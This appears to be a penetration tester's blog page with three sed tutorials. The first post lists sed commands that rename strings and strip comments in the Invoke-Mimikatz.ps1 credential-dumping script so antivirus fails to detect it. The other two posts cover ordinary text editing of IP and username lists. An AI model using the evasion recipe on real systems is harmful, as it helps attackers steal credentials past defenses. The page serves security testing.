Avoiding AV detection when running mimikatz with sed!

In this post I will be talking about avoiding AV detection when running mimikatz with sed! I came across this on the BlackHills Information Security Website, link here. Props to Carrie Roberts for sharing this. The classic Invoke-Mimikatz.ps1 from the PowerSploit suite located here, does get detected by many Anti-Virus vendors. This really is a great for the Enterprise. However whats not so great is the way in which AV vendors are detecting it and how it can be easily bypassed! Yes AV can easily be bypassed by modifying the powershell file. Using ‘sed’ in bash we can swap out various text in the ps1 file. For example swapping out mimikatz for mimidogz as in line 1 below.

I have talked about slowing down attackers who are using mimikatz in this post. This is where we can deny access to the clear text credentials in early versions of Windows (up to windows 7). In later versions of windows (8 and above) we can deny access to the hash and the clear text credentials. This will only slow attackers down though as the OS can be modified, however this will make noise on the network. This is really is a must for slowing down attackers. Harden your systems!

Below are the sed commands:

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

 

Sed – Part 2 – Using Sed To remove text from a line in linux

How do we remove specific text from each line in a text file in Linux? In this post we cover using Sed to remove text from a line in Linux.

Sed to remove text from a line in linuxWe previously covered in this post adding text to a line in Linux. In this post we will be specifically talking about the opposite. Using Sed to remove text from a line in linux is fairly straight forward. To remove specific characters or portion of text from a line in Linux we can use command line bash tool sed. The tool sed is used to perform basic text transformations, more info on sed can be found here. In the below example we want to specifically remove ‘BARRY\’ from a line everything within the square brackets [text to remove] is removed, so we use:

sed 's/[BARRY\]//g'

example:

cat users | grep BARRY | cut -d" " -f 2 | sed 's/[BARRY\]//g'

Hopefully you will find this useful!

Sed – Part 1 – How to add a word/text to the end of each line of a file in Linux

Using sed to add text to the end of each line in Linux.

sed to add text to the end of each line in LinuxIn this example we are going to use sed to add text to the end of each line in Linux. More specifically in a text file in Linux using a bash one liner! Why would we want to do this? Multiple reasons if your penetration tester. Creating user name lists or adding ports to the end of IP addresses for example. Sed is used to perform basic text transformations you can read more about it here.

So for example if we wanted to add ‘:80’ to the end of each line for a list of IP address we would do the following:

for example

sed ‘s/$/:80/’ IP.txt >  new_IP.txt

~$cat IP.txt 
192.168.0.1
192.168.0.2
192.168.0.3
192.168.0.4
192.168.0.5
~$sed 's/$/:80/' IP.txt > new_IP.txt
~$cat new_IP.txt 
192.168.0.1:80
192.168.0.2:80
192.168.0.3:80
192.168.0.4:80
192.168.0.5:80

Or  if we found we wanted to add ‘adm’ to the end of each line in a list of user names we would also use sed.

~$cat admins.txt 
adam
bob
bill
james
jane
~$sed 's/$/adm/' admins.txt > new_admins.txt
~$cat new_admins.txt 
adamadm
bobadm
billadm
jamesadm
janeadm
~$

Having these small bash commands to hand is super useful. As a penetration tester I am always find that I need to script something in Bash or PowerShell or needing to produce one liners. Having these commands to ready and waiting saves time looking them up. Hopefully you will also find them useful. Don’t forget the man pages for bash commands. Practice, practice and more practice.